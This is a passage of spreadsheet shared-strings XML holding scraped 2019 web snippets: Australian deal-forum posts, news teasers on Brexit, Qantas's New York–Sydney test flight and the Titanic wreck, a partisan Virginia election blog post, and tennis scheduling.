on The Path in the comments section below. .</t>
  </si>
  <si>
    <t>Nuclearvodka</t>
  </si>
  <si>
    <t>Found this deal today looking for a Google Hub. Cheapest I've found was $143 from Catch.com Google Assistant Built-In Voice-Activated 7" WSVGA Touchscreen Dual Far-Field Microphones Wi-Fi &amp; Bluetooth Wireless Connectivity 2" Full-Range Speaker 2x 2" Passive Bass Radiators Ambient EQ Control Compatible Smart Home Devices Mic Mute Button for Added Privacy May not support smart home control and local radio channels in regions outside the United States</t>
  </si>
  <si>
    <t>Emilia Terzon</t>
  </si>
  <si>
    <t>A Melbourne council will hold a "solemn" ceremony to acknowledge the impact of European settlement on Indigenous Australians before its usual Australia Day celebrations — a move an Aboriginal group says could provide a national model for January 26.</t>
  </si>
  <si>
    <t>The five-year-old daughter of a British-Iranian woman jailed in Iran has returned home to the UK after more than three years living in the Middle East.</t>
  </si>
  <si>
    <t>AN gang armed with knuckle dusters and poles attempted to break into an Aldi branch in South Ruislip, London, as terrified customers barricaded themselves into the shop. Daily Express :: News Feed</t>
  </si>
  <si>
    <t>Gems coach Lloyd Makunde says he is still to receive his earnings from the team’s participation at the World Cup in the UK. Makunde’s earnings were deposited in the wrong bank account after his surname was incorrectly spelt, leading to a mix-up. And for the last two months, he has been frantically trying to have the issue resolved without any luck. “Despite all the hard work, dedication</t>
  </si>
  <si>
    <t>The RBA's moves now have a negligible effect; it may be time to question its credibility.</t>
  </si>
  <si>
    <t>The taoiseach says a deal may be reached, but the PM's current proposals will not break the Brexit deadlock. The post Brexit: Deal still possible at European Council summit, says Varadkar appeared first on Education - Career - Word Games - Distance learning.</t>
  </si>
  <si>
    <t>With weight and health issues, hopefully, behind him, quality local jockey Shane Pawsey will look to take it easy from here on out.</t>
  </si>
  <si>
    <t>I had literally just clicked on Washington soars to 98 degrees, breaking all-time October heat mark, which observed, “Washington is experiencing a beastly hot October day, unlike anything it has previously observed” and that this is “consistent with the increase in temperatures expected due to climate warming from increasing concentrations of heat-trapping gases in the atmosphere from fossil fuel burning.” Then I saw the following press release, from the Virginia House Democrats, about a climate-science-denying Virginia Republican candidate for House of Delegates. I mean, seriously, WTF is wrong with these people? Are they demented? Do they work for a fossil fuel company or own large amounts of stock in ExxonMobil or whatever? Do they actually *want* to make the one home we have uninhabitable for some nihilistic, insane reason? But again, WTF is wrong with these people? And why would anyone in *their* right mind vote for someone who denies climate science, or frankly not laugh in their faces? My god… Republican Candidate Vandergriff Comes Out As Climate Science Denier References debunked phony TIME cover on global cooling HENRICO (October 2, 2019) – Gaydonna Vandergriff, Republican challenger to Delegate Schuyler VanValkenburg (D-Henrico) in HD-72, believes the conversation on climate science is too “dramatic.” In a forum hosted by the ChamberRVA Henrico Cabinet on Tuesday, Vandergriff answered a question on climate change by saying, “I just saw recently…a Time magazine article telling me that we’re all going to freeze to death and then almost the exact same cover design telling me no, we’re all going to burn up. We need to quit being so dramatic.” According to NASA, “…the vast majority of actively publishing climate scientists – 97 percent – agree that humans are causing global warming and climate change. Most of the leading science organizations around the world have issued public statements expressing this…” The image of a supposed TIME cover, purporting a coming ice age, that Vandergriff referenced has been proven to be a hoax. The actual TIME cover and story were about the very real effects of global warming. Virginia Commonwealth University’s Capital News Service posted a video of Vandergriff’s response on Twitter. “Not only did Ms. Vandergriff call 97 percent of climate scientists ‘dramatic,’ she perpetuated the harmful notion that legitimate and respected media outlets are ‘fake news’ by discrediting articles on climate change. Ironically, Ms. Vandergriff spread ‘fake news’ herself by referencing an internet hoax as if it were real,” said House Democratic Caucus communications director Kathryn Gilley. “Ms. Vandergriff’s skepticism of respected scientists and journalists is alarmingly out of touch with Henrico.” Last year, the Yale Program on Climate Change Communication published data on attitudes toward climate change, and found that in Henrico County specifically: 70 percent of residents believe global warming is happening, and 72 percent believe it will harm future generations 79 percent of residents support regulating CO2 as a pollutant 58 percent of residents say local officials should do more to address global warming Many reports have detailed the serious impacts of climate change on Virginia, including that poorer air quality from warmer temperatures will exacerbate health issues like asthma, and that sea level rise and warming temperatures will negatively affect Virginia’s largest commercial industry, agriculture. Delegate VanValkenburg responded to Vandergriff’s comments by stating, “The science is the science,” before addressing ways to protect Virginia from the harmful health and economic effects of climate change.</t>
  </si>
  <si>
    <t>Back in 2017, I did several posts where I tried to bring a bunch of information about House of Delegates races together in one place, and also to rank the districts in descending order of likelihood Democrats have of winning the district. Looking back on my 10/1/17 rankings, in hindsight they look very solid, with only three Dems out of the 18 on the list who ended up losing (Donte Tanner, whose race I ranked #10, ended up very narrowly losing to Del. Tim Hugo in HD40; Shelly Simonds, whose race I ranked #16, ended up in a tie, then lost in a drawing of names from a ceramic bowl; and Willie Randall, whose race I ranked #18, lost to Del. Rob Bloxom in HD100). Anyway, this was a popular post, probably because it provided a sort of “one-stop shopping” for folks to get some information, at a glance, about the top races in Virginia that year. And so, by popular request, here’s my list for 2019 Virginia State Senate and House of Delegates races, this time in categories based on: 1) Democratic State Senate incumbents whose seats we need to hold on to; 2) Democratic House of Delegates incumbents whose seats we need to hold on to; 3) Democratic State Senate challengers who stand a decent or better shot at defeating a Republican incumbent; 4) Democratic House of Delegates challengers who stand a decent or better shot at defeating a Republican incumbent. Note that I’m referencing the 9/2 analysis by Chaz Nuttycombe and Ben ‘Not Larry Sabato” Tribbett, which in fairness is several weeks old now. Also note that I’m referencing the 2017 Ralph Northam vs. Ed Gillespie election results as a rough proxy for district lean, because: a) that election was after Trump took office, shifting the political landscape and energizing the Democratic “resistance”; b) that was a state, NOT federal, election, so it’s somewhat comparable – although clearly turnout’s higher in a gubernatorial election year! – to this year, whereas the mid-term election year of 2018 isn’t nearly as comparable. Finally, these are listed, within each category, in very roughly descending order of priority or concern, whatever the case may be. But I really wouldn’t focus on the order so much as on simply using the following as a handy, one-stop shopping list of 2019 Virginia General Assembly races we should pay attention to over the next 33 days. Hope this is helpful. Democratic State Senate incumbents whose seats we need to hold Good news here: no Democratic State Senate incumbents are seriously in danger of losing. Democratic House of Delegates incumbents whose seats we need to hold House District 10 (54%-45% Ralph Northam district): This 80% Loudoun/15% Frederick/5% Clarke district’s a must-hold for Democrats, with first-term Del. Wendy Gooditis up for her first reelection since the 2017 “blue wave,” and facing former Del. Randy Minchew, who she defeated narrowly (52%-48%) the last time around. In terms of money, the two candidates were about even as of 8/31, with Gooditis at $279 cash-on-hand and Minchew at $305k. The key here, as it is in many districts, is to minimize Democratic voter “dropoff” from the 2017 gubernatorial election. Given that Northam won this district by 9 points, if Dems show up to vote, we should win. If not, we could very well lose. Which would be very bad news for Democratic chances of taking control of the Virginia House of Delegates, of course. So let’s make sure Gooditis holds this seat! (note: Chaz has this one at “Tilt D” and Ben has it as “Slight-Lean Democratic”) House District 51 (55%-44% Ralph Northam district): First-term Democratic incumbent Del. Hala Ayala is in a rematch with former Del. Rich Anderson (R), who she defeated in 2017 in this Prince William County district. Definitely a seat Democrats should, and must, hold this November 5. As of August 31, Ayala $268k cash-on-hand, about twice Anderson’s $138k. Chaz has this one as “Lean D” and Ben has it as “Slight-Lean Democratic.” I’d go with “Lean D” at this point. Go Hala Ayala! House District 13 (57%-41% Ralph Northam): I’m putting this one on the list simply because I’ve heard that internal polling has shown first-term Del. Danica Roem (D) to be in a close race here. And, of course, Democrats have to hold their incumbents, including Roem. I personally think that Roem will defeat her Republican opponent, Kelly McGinn, for several reasons: 1) the district leans heavily Democratic, with the 16-point Northam win as well as a 26-point Kaine win last November; 2) Danica Roem is a very strong candidate; 3) Kelly McGinn doesn’t seem particularly strong; 4) in terms of cash-on-hand, Roem had $171k as of 8/31, nearly three times as much as McGinn, who had just $64k. Still, let’s take nothing for granted here and make absolutely sure that Del. Roem is reelected! Chaz has this one as “Lean D” and Ben as “Slight-Lean Democratic.” I’d go with “Lean D,” personally. House District 21 (56%-42% Ralph Northam district): First-term Democratic Del. Kelly Fowler (D) is being challenged by Republican Shannon Kane in this strongly blue-leaning district in Virginia Beach (91%) and Cheseapeake City (9%). As of 8/31, Fowler had $150k cash-on-hand, while Kane only had $47k. So, bottom line, Fowler should hold on to this seat and really must do so for Democrats to have any chance of taking back the House of Delegates majority. Let’s just make sure of that – as with all of our incumbents, whose reelection is a top priority. Chaz and Ben both have this one as “Lean D.” I agree. House District 85 (57%-41% Ralph Northam district): This Virginia Beach district is an open seat, after first-term Del. Cheryl Turpin (D) opted to run for State Senate instead of reelection to the House of Delegates. The candidates here are Democrat Alex Askew and Republican Rocky Holcomb. In the money race, Askew had $179k at the end of August, while Holcomb had just $68k. That’s good news. Also note that Tim Kaine won this district by 16 points last November. So, Democrats should definitely be able to hold this seat. And we really need to, if we want to take back control of the House of Delegates. Note that Chaz has this one at “Tilt D” and Ben has it as “Tossup.” I’d go with “Tilt D” on this one. House District 73 (53%-45% Ralph Northam district): This Henrico County district is also an open seat, after first-term Del. Debra Rodman (D) announced that she was running for State Senate instead of reelection to the House of Delegates. The candidates here are Democrat Rodney Willett and Republican Mary Margaret Kastelberg. Democrats really need to hold this one, and it’s certainly winnable – as long as Willett has the resources he needs to compete and Democrats turn out in solid numbers. Note that Willett had $175k cash on hand as of August 31, while Kastelberg only had $68k. Chaz rates this one as “Tilt D” and Ben has it as “Tossup.” I’d go with “Tilt D.” The bottom line is that Democrats can hold this seat, and really need to if we are going to get to a majority in the House of Delegates. House District 68 (56%-43% Ralph Northam district): First-term Democratic Del. Dawn Adams is facing Republican Garrison Coward in a Chesterfield County/Richmond City/Henrico County district that went for Northam by 13 points in 2017 and Kaine by 24 points in 2018. In terms of cash-on-hand, Adams had $236k as of 8/31, while Coward had only $24k. Chaz and Ben both have this one as “Toss-Up.” I’d say it leans Democratic. House District 50 (58%-41% Ralph Northam district): First-term Del. Lee Carter should be ok in this solidly “blue” district in Prince William County (56%) and Manassas City (44%). But let’s take no chances, because again, we need to hold our incumbent seats as a top priority. Also, I’d note that if Carter is losing, then Democrats are probably having a very bad night on November 5. Note that Carter and his Republican opponent, Ian Lovejoy, had about the same cash-on-hand as of 8/31. Chaz has this one as “Lean D” and Ben has it as “Tossup.” I’d go with “Lean D.” I’m not particularly concerned about the reelection chances of Democratic Delegates Schuyler VanValkenburg, Mike Mullin Elizabeth Guzman, or Roslyn Tyler, but let’s just make sure that there are no surprises in these districts! Democratic State Senate challengers who stand a decent or better shot at defeating a Republican incumbent Senate District 10 (57%-42% Ralph Northam district): This Richmond/Chesterfield/Powhatan district is the most Democratic State Senate district (in addition to Northam’s 15-point win in 2017, Tim Kaine won it by 24 points last year) currently held by a Republican. It’s also clearly the type of urban/suburban district – where issues like transportation, schools, gun violence, healthcare and the climate crisis are high priorities, and of course outrage at Trump – which Democrats have been winning the past couple years, since the Misogynist and Sexual Predator in Chief took office. So clearly, Democrats can and must take back this seat. Fortunately, Dems have a great candidate in Ghazala Hashmi, and hopefully her victory on election will take Senate Democrats to 21 seats and the majority. As of August 31, Hashmi had $302k, compared to Sturtevant’s $353k, so those numbers were pretty close, with a slight edge to Sturtevant. Both Chaz and Ben have this one as “Lean D.” I agree. Go Ghazala! Senate District 13 (55%-44% Ralph Northam district): With incumbent Sen. Dick Black (R) stepping down, with this Loudoun/Prince William County district having gone for Ralph Northam by 11 points (and for Tim Kaine by 18 points), with a strong Democratic candidate in Del. John Bell, and with a far-right/extreme Republican nominee in Geary Higgins, this one is practically a certain pickup for Democrats (if not, Dems will be having a HORRIBLE election night). John Bell, by the way, had far more cash-on-hand than Higgins ($303k-$123k) as of August 31. This is also a district that Democrats absolutely HAVE TO WIN – and are strongly favored to win – to have a shot at taking back State Senate control this November 5. Chaz Nuttycombe has it at “Likely D” and Ben Tribbett has it at “Lean D.” I’d go with “Likely D.” Gotta win this one. Senate District 12 (52%-47% Ralph Northam district): Democrat Debra Rodman against incumbent Republican Sen. Siobhan Dunnavant. As of 8/31, Rodman had around $200k more cash-on-hand than Dunnavant, which bodes well for her in this blue-tilting district in Henrico County (92%) and Hanover County (8%). Chaz has this one as “Tilt D” and Ben has it as “Tilt R.” I’ll compromise and go with “Tossup.” Would love love love to see Rodman win this, as she’s a great person, strong Democrat, and infinitely better than Dunnavant. Senate District 7 (54%-45% Ralph Northam district): Democrat Cheryl Turpin opted out of running for reelection to the House of Delegates to run for this blue-leaning open State Senate seat in Virginia Beach (96%) and Norfolk City (4%). As of 8/31, Turpin had $260k cash-on-hand, about the same as her Republican opponent, Jen Kiggans. This is one that Democrats can win, and really have to win if we want a comfortable State Senate majority. Chaz has this one as”Lean D” and Ben has it as “Tilt R.” I’ll compromise again and go with “Tossup,” and am strongly rooting for Turpin to win this open seat! Senate District 8 (50%-49% Ralph Northam district): Democrat Missy Cotter Smasal takes on incumbent Republican Sen. Bill DeSteph in this “purple” district. As of 8/31, Smasal had a bit more cash-on-hand than DeSteph. More broadly, Smasal is an excellent fit for this 100% Virginia Beach district and certainly has a shot at winning. If she does, that means Democrats are most likely having a very strong election night. Chaz has this one as “Tilt R” and Ben has it as “Likely R.” I’d go with “Tilt R” on this one, but would be thrilled to see anti-Muslim bigot, Bill “Rub Me Lamp” DeSteph go down to defeat on November 5th! Senate District 17 (50%-49% Ed Gillespie district): If Democrat Amy Laufer is beating incumbent Republican Sen. Bryce Reeves on November 5 in this purple district, it means that Democrats are likely going to take back the State Senate by several seats. Chaz has this one as “Tilt R” and Ben has it as “Likely R.” I’d go with “Lean R,” but obviously would love to see Laufer knock out right wingnut Reeves. Senate District 11 (53%-46% Ed Gillespie district): The battle of the “Amandas” – incumbent Republican Sen. Amanda Chase, who has said and done a gazillion crazy/extreme/offensive things and RICHLY deserves to lose, and Democrat Amanda Pohl, who is a strong candidate with more cash-on-hand than Chase as of 8/31. Still, as much as Chase totally deserves to lose, the Republican district lean here means that if Pohl is winning, that means that Democrats are having a very good night. Chaz has this one as “Tilt R” (he updated SD11 on 9/30, after Chase was kicked out of the party by the Chesterfield GOP) and Ben has it as “Lean R.” I’d go with “Lean R.” One more of interest, if Democrats are having a really good night on November 5th, is: Democrat Qasim Rashid vs. Republican Sen. Richard Stuart in SD28 (54% Gillespie district; Stafford, Prince William, King George, Spotsylvania, Westmoreland) Democratic House of Delegates challengers who stand a decent or better shot at defeating a Republican incumbent House District 40 (55%-44% Ralph Northam district): Democrat Dan Helmer is running against long-time incumbent Del. Tim Hugo (R), who is the last Republican delegate standing in Northern Virginia, in this Fairfax/Prince William Counties district. this one’s definitely winnable. Note that Hugo had more money than Helmer as of August 31 ($449k-$329k), but that Helmer certainly has enough money to compete effectively. Chaz has this one as “Toss-Up” and Ben has it as “Leaning Republican.” I’d go with “Tossup.” Let’s win this thing, both because Helmer’s great AND because Hugo is godawful! House District 28 (51%-48% Ralph Northam): Another district that appears to be getting “bluer,” with Tim Kaine winning last November by 12 points (55%-43%). As for the candidates, Democrat Josh Cole barely lost in 2017, by a 50.08%-49.73% margin (just 82 votes out of more than 23,000 cast). This time around, Cole is facing a right-wing “Tea Party”-style Republican in Paul Milde. In terms of money, Cole had $259k cash-on-hand at the end of August, while Milde had only $15k. So right now, this district’s probably a toss-up or possibly even a slight lean towards Cole. If Democrats win in HD28, it means we’re almost certainly having a good night across Virginia. Chaz and Ben both have this one as “Toss-Up.” If anything, I’m a bit more optimistic, maybe “Tilt D.” Keep a close eye on this race and do what you can to help Josh Cole win! House District 76 (60%-39% Ralph Northam): Another one of the most powerful Republicans in the House of Delegates, Del. Chris Jones, is in danger of losing his seat to Democrat Clint Jenkins. One big advantage for Jones is money – he’s got tons of it (around 10 times as much as Jones as of August 31). On the other hand, this district is now VERY “blue,” post-“unpacking,” with Northam having won it by 21 points in 2017 and Kaine by 25 points in 2018. So basically, if Democrats turn out there, Jenkins can win, even in spite of the cash-on-hand gap. Chaz has this one as “Tilt D” and Ben as “Tossup.” I’d go with “Tossup.” This would be a huge race for Democrats to win, but of course we’ll require a TON of money and volunteer support. Let’s make it so! House District 94 (60%-39% Ralph Northam district): This Newport News district is currently held by Del. David Yancey (R), who defeated Democrat Shelly Simonds in 2017 after a tie was broken by pulling his name out of a ceramic bowl. This time around, Simonds should win outright, given that the district moved significantly in the Democratic direction after the courts ruled that the Republicans’ racial “packing” were illegal. So now, it’s an overwhelmingly “blue” district...</t>
  </si>
  <si>
    <t>Uskompuf</t>
  </si>
  <si>
    <t>Thanks to CheapGit for sharing this deal on the forum. Some Features 6" QHD+ OLED FullVision™ Display F1.6 Crystal Clear Glass Lens Processor - Qualcomm Snapdragon 835 RAM (GB) - 4.0 Cine Video Mode Point Zoom Wide Angle Cameras 32-bit Hi-Fi Quad DAC 128GB Storage IP68 Certified Dual Sim NFC and Band 28 ! Dimensions (L x W x H) 151.7 x 75.4 x 7.4 mm Headphone Jack</t>
  </si>
  <si>
    <t>Learn how to use, deploy, and re-pack our Liquid Force Kiteboarding Inflatable Safety Vests from the Liquid Force Kiteboarding product team. source The post LFK How To : Inflatable Safety Vests appeared first on TRAVELAMBASSADOR.CA.</t>
  </si>
  <si>
    <t>(CNN) — And we have takeoff. A research flight set to test human limits on long-haul flights during what will be the first commercial flight to travel non-stop from New York to Sydney has departed John F. Kennedy International Airport. With 50 passengers and crew on board acting as ultra long-haul guinea pigs, the Qantas Flight 7879 is expected to complete the 10,200-mile journey in 19-and-a-half hours, subject to wind and weather conditions. It is due to arrive in Sydney Sunday morning, local time. Research will be carried out on passengers and crew, Qantas has said, to quantify the effects flying such a distance has on those on board, including health, wellness and jetlag. It was reported on Friday that most on board would be Qantas employees, although six Qantas Frequent Flyer volunteer passengers were expected to take part too. Four pilots will work on rotation during the flight, with two additional pilots in the cabin, Qantas said. “Months of flight planning has gone in to determining the optimum flight path, including running daily plans to establish wind and weather patterns,” said the airline on its website. The Boeing 787-9 Dreamliner flight is the first of three test flights, dubbed by the airline as “project sunrise,” which will run in October, November and December to gather data. The next test flight will take place in November, from London to Sydney, while there will be another New York to Sydney flight before the end of the year. After the test flights, the new planes will enter commercial service. Quantas has said it hopes to operate direct flights from three cities on Australia’s east coast — Sydney, Melbourne and Brisbane — and New York and London by 2022. Currently the only direct route from Australia to Europe goes from Perth to London, a 9,000-mile journey which started in March 2018. How will passengers be monitored? Researchers from Sydney University’s Charles Perkins Centre, Monash University and the Alertness Safety and Productivity Cooperative Research Centre — a scientific program backed by the Australian government — will examine the impact of the long flight on those on board. Passengers in the main cabin will wear monitoring devices, and experts from the Charles Perkins Centre will study how their “health, wellbeing and body clock” are impacted by a set of variables that include lighting, food and drink, movement, sleep patterns and inflight entertainment. Those on board have been advised to keep a daily log in the lead-up to the flight and for two weeks afterwards, to show how they feel and how they’ve coped with jet lag. Pilots and cabin crew will also be monitored and keep sleep diaries. Cameras will be mounted in the cockpit to record pilot alertness. “People seem to be wildly different when it comes to the experience of jetlag — and we need more research on what contributes to jetlag and travel fatigue, so we can try and reduce the impact of long-haul flights,” Professor Stephen Simpson, academic director of the University of Sydney’s Charles Perkins Centre, told CNN Travel. “We have a long way to go in terms of understanding how the wide variety of influences — including nutrition, hydration, exercise, sleep and light — might work together for maximum benefit.” Monash University scientists will focus on the flight crew, recording their melatonin levels before, during and after the flights, as well as studying brain wave data from electroencephalogram devices worn by the pilots. This information will then be shared with the Civil Aviation Safety Authority “to help inform regulatory requirements associated with ultra-long-haul flights,” Qantas said in a statement. Francesca Street and Emily Dixon contributed to this report. First commercial flight from New York to Sydney departs JFK The post First commercial flight from New York to Sydney departs JFK appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>‘Even gangsters have honour among thieves’ See full article at Independent.co.uk » The post Robert De Niro says Trump thinks he’s a gangster: ‘He’s not even a good gangster’ appeared first on www.cinemagotrailers.co.uk.</t>
  </si>
  <si>
    <t>Victorian Premier Daniel Andrews says he does not think climate activists will "win many friends" as Extinction Rebellion demonstrators block traffic and trams in Melbourne's CBD for the second day in a row.</t>
  </si>
  <si>
    <t>Katrina - The Organised Housewife</t>
  </si>
  <si>
    <t>It's important for busy mothers to look after themselves, make time for themselves, and ensure they don't burn out - here's some self care tips to help do just that! The post How To Prevent Motherhood Burn-Out appeared first on The Organised Housewife.</t>
  </si>
  <si>
    <t>A poll of advertising and marketing managers reveals the barriers to integrating things like AI into their teams. Read More</t>
  </si>
  <si>
    <t>The quick-thinking taxi driver drove off while the man was allegedly trying to get the woman out of the car after the assault.</t>
  </si>
  <si>
    <t>Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/VheE8cvVgJo/titanic-shipwreck-disappearing-dive-reveals-2019-9 The Titanic is slowly but surely disappearing — here’s what the wreck looks like now The Titanic sank on April 15, 1912, after it hit an iceberg during its maiden voyage from England to New York. The accident killed 1,517 people. The steam liner sank to a depth of more than 12,000 feet. Its remains were located on September 1, 1985. Since then, dozens of manned and unmanned submersibles have visited and photographed the Titanic’s disintegrating body on the sea floor. In August, divers visited the wreckage for the first time in 14 years. Their photos reveal that the ship has significantly deteriorated due to deep-sea currents and metal-eating bacteria. Visit Business Insider’s homepage for more stories. In the early hours of April 15, 1912, the RMS Titanic slipped more than 12,000 feet beneath the waves, killing 1,517 people. The ship had been on its maiden voyage to New York City, but hit an iceberg about 400 miles from Newfoundland. The wreckage sat undisturbed for more than 70 years until the US Navy discovered it during what was later revealed to be a secret Cold War mission on September 1, 1985. Since then, dozens of manned and unmanned submersibles have visited the Titanic’s underwater remains. Read More: 42 secrets you never knew about the Titanic and the people aboard it In August, divers from the Triton Submarines exploration team filmed the wreckage over a series of five dives; it was the first time people had returned to the Titanic in 14 years. The expedition captured ultra high-definition 4K footage, which could help researchers create 3D models of the ship, assess the Titanic’s current condition, and make projections about its future. Because the Titanic isn’t timeless. In fact, scientists think the entire shipwreck could vanish by 2030 due to bacteria that’s eating away at the metal. The following photographs reveal the Titanic’s deteriorating conditions. SEE ALSO: 5 wild conspiracy theories surrounding the sinking of the Titanic “Yes, like all things, eventually, Titanic will vanish entirely. It will take a long time before the ship completely disappears, but the decomposition of the wreck is to be expected and is a natural process,” Patrick Laney, president and co-founder of Triton Submarines, told Business Insider. Laney participated in three of Triton’s five dives in August. Since Laney had never visited the wreck before, he couldn’t gauge wreck’s condition based on personal observations. But many experts agree that the ship looks very different than it did during previous expeditions. Laney said the ship is losing a battle against the elements. Deep-sea currents, salt corrosion, and metal-eating bacteria are whittling away the wreckage, which lies more than 2 miles under the ocean surface. “The ship has certainly deteriorated just as one would expect a steel vessel to degrade over time,” Laney said. Microbial biologist Lori Johnston told USA Today that much of the deterioration comes from a group of bacteria, named Halomonas titanicae after the ship, which are “working symbiotically to eat, if you will, the iron and the sulfur.” When these iron-loving bacteria munch on the steel of the sunken ship, they cause stalactite-like structures to form on the wreck. These rust-colored icicles are (appropriately) called rusticles. Henrietta Mann, the scientist who co-discovered these bacteria in 2010, told Time that based on this new expedition footage, the Titanic has only 30 years left before it disappears. Mann was not involved in the recent dives, but Victor Vescovo, one of the recent expedition leaders, told Time that “the wreck has been down there 107 years in strong currents and seawater, so it is a matter of not if, but when, the sea will reclaim it in its entirety.” The speed of the Titanic’s deterioration increases as the ship’s upper levels crumble, Mann said. “If one level deteriorates at the top [of the wreck], it drops to the next one,” she added, “which means it … impacts on the lower levels. Damage is done layer after layer.” One such collapse demolished one of the wreck’s most famous sections: Captain Edward Smith’s quarters. In 1996, the contents of this room on the Titanic’s starboard side, including the remains of Smith’s bathtub, were easily visible. Now, the room and the bathtub can no longer be seen — they’re lost in the inaccessible depths of the wreck. The Titanic’s starboard side was “the most shocking area of deterioration,” Titanic historian Parks Stephenson said in a statement. “Captain’s bathtub is a favorite image among the Titanic enthusiasts, and that’s now gone,” Stephenson added. “That whole deck hole on that side is collapsing, taking with it the state rooms, and the deterioration is going to continue advancing.” The recent Triton submarine footage will be used in an upcoming documentary film by Atlantic Productions. The high-definition footage is intended to allow for augmented-reality and virtual-reality visualizations of the wreck in its current state. It won’t be the first high-tech reconstruction of the Titanic wreckage — this 360-degree panorama went on display in Leipzig, Germany two years ago. But given the rate of the ship’s erosion, the panorama is no longer accurate. The 2017 panorama was created by artist Yadegar Asisi and simulates what it’s like to be on the ocean floor exploring the ship 12,500 feet below sea level. For his part, Laney said there was nothing surprising about the condition of the Titanic. “I was pleased to see the ship visibly returning to its elemental state as the ocean consumes the vessel over time while providing refuge for a surprising assortment of marine life,” he said. Source: http://feedproxy.google.com/~r/typepad/alleyinsider/silicon_alley_insider/~3/VheE8cvVgJo/titanic-shipwreck-disappearing-dive-reveals-2019-9 The post The Titanic is slowly but surely disappearing — here’s what the wreck looks like now appeared first on CYBERDEN.</t>
  </si>
  <si>
    <t>The leaders of the House of Representatives Judiciary Committee said late on Tuesday that they had begun receiving data from Facebook, Alphabet's Google, Amazon and Apple as part of their probe into the companies' potential breaches of antitrust law.</t>
  </si>
  <si>
    <t>The capital city of Santiago descended into chaos amid riots that left a downtown building engulfed in flames and its metro system shuttered.</t>
  </si>
  <si>
    <t>"This is not only an action film, but an exploration of what one's younger self can ultimately teach one's older self" The post Gemini Man: trailer, cast and release date for the new Ang Lee film starring Will Smith appeared first on 24plusnews.co.uk.</t>
  </si>
  <si>
    <t>Backto60 wants to raise £72,000 in total to challenge the court's judgment, delivered earlier in October… Read More</t>
  </si>
  <si>
    <t>Following a day of negotiations, Vice President Mike Pence said Turkey agreed to a five-day cease-fire in Syria to allow Kurdish forces to withdraw, and in return the U.S. would pull back on economic sanctions against Turkey. Photo: Adem Altan/AFP via Getty Images</t>
  </si>
  <si>
    <t>A VICTORIAN fire boss has been appointed to lead Queensland Fire and Emergency Services.</t>
  </si>
  <si>
    <t>dmiser</t>
  </si>
  <si>
    <t>Samsung Galaxy Watch Active 2 just got launched in Australia and it is already available on Samsung's education store. It may even be available via Samsung Enhanced Partner Portals but I cannot verify that. Only two colours, Black and Gold are available and no choice of casing material on the Education Store, however, the 40mm version only comes in Stainless Steel material by the looks of it. For details on bonus buds click on https://www.samsung.com/au/galaxy-offer/ I have set the expiry of this deal to match the expiry of the Bonus Buds Offer. Enjoy!</t>
  </si>
  <si>
    <t>MATCH POINTS Linz finalist Jelena Ostapenko has reached back-to-back quarterfinals for the first time since making the last eight of Eastbourne and semifinals of Wimbledon last year, and is bidding to seal her first consecutive semifinal showings since Wuhan and Beijing in 2017. Opponent Antonia Lottner has now reached one WTA quarterfinal in each of the past three years following Gstaad 2017 and ‘s-Hertogenbosch 2018, and is seeking to reach her first semifinal at this level. Defending champion and 2010 runner-up Julia Goerges takes on 2017 finalist Monica Puig for the seventh time today – but first time indoors. Puig won the first four matches of their rivalry between 2013 and 2016, including a two-hour, 58-minute 7-5, 6-7(4), 7-5 thriller in the second round of Roland Garros 2016 – but Goerges bounced back to win their two most recent meetings last year in the first rounds of Auckland and Wimbledon. An all-Russian derby finds No.8 seed Anna Blinkova bidding for her second career semifinal one month after reaching her first in Guangzhou against Margarita Gasparyan. The compatriots have split two previous meetings, with Gasparyan winning 6-4, 6-2 in the quarterfinals of the Limoges 125K last year indoors and Blinkova gaining revenge in a 6-3, 4-6, 8-6 epic in the second round of this year’s Roland Garros. Gasparyan is bidding for her first semifinal since Istanbul in May. No.3 seed Elena Rybakina defeated Laura Siegemund 6-3, 4-6, 6-3 in their only previous meeting, in the second round of the Launceston ITF W60 event in January. The Kazakh would go on to win the title – the first of three ITF trophies that kickstarted her rise from World No.191 at the end of 2018 to her current career high of World No.43, a breakthrough that has also included a maiden WTA title in Bucharest and a second final in Nanchang. ORDER OF PLAY (all courts start 12 noon) CENTER Laura SIEGEMUND (GER) vs [3] Elena RYBAKINA (KAZ) Margarita GASPARYAN (RUS) vs [8] Anna BLINKOVA (RUS) Not before 6pm [WC] Jelena OSTAPENKO (LAT) vs [Q] Antonia LOTTNER (GER) Monica PUIG (PUR) vs [2] Julia GOERGES (GER) COURT 1 Hayley CARTER (USA) / Luisa STEFANI (BRA) vs [2] Kaitlyn CHRISTIAN (USA) / Alexa GUARACHI (CHI) Not before 1.30pm [1] Kristyna PLISKOVA (CZE) / Renata VORACOVA (CZE) vs Coco GAUFF (USA) / Catherine MCNALLY (USA) The post Luxembourg 2019: Friday’s Order of Play and Match Points appeared first on Women’s Sport Network.</t>
  </si>
  <si>
    <t>Oct 2, 2019 The new season is less than three weeks away and training camps are in full swing across the league. And while established stars are using the preseason to prepare for the grind of another campaign, others are using it as an opportunity to showcase their development. In this training camp edition of ESPN’s NBA Power Rankings, we’re taking stock of the latest league hierarchy while breaking down one player on each team who could be on his way to becoming a household name in 2019-20. Note: These rankings are based on where voters — more than 40 ESPN NBA reporters, insiders and editors — think teams belong heading into the 2019-20 season. Title odds for 2019-20 were provided by Caesars Sportsbook. ESPN.com’s Malika Andrews, Tim Bontemps, Nick Friedell, Andrew Lopez, Tim MacMahon and Royce Young contributed the following information. More: 30 camp questions | Lowe’s</t>
  </si>
  <si>
    <t>EASTENDERS fans were left in tears tonight after Bex Fowler appeared to take her own life as her storyline reached its climax. Daily Express :: TV and Radio Feed</t>
  </si>
  <si>
    <t>New Lance 2445 Travel Trailer Walkthrough Tour The post New Lance 2445 Travel Trailer Walkthrough Tour appeared first on Travel-Store.</t>
  </si>
  <si>
    <t>Popular App.. Enjoy :) iOS Android Teach Your Monster to Read is an award-winning phonics and reading game that’s helped millions of children learn to read. • Parents have seen significant improvements in their children’s literacy within weeks. • Teachers claim it’s a wonderful and captivating classroom tool that helps their students learn to read. • Kids love making their monster and teaching it read. They learn through play.</t>
  </si>
  <si>
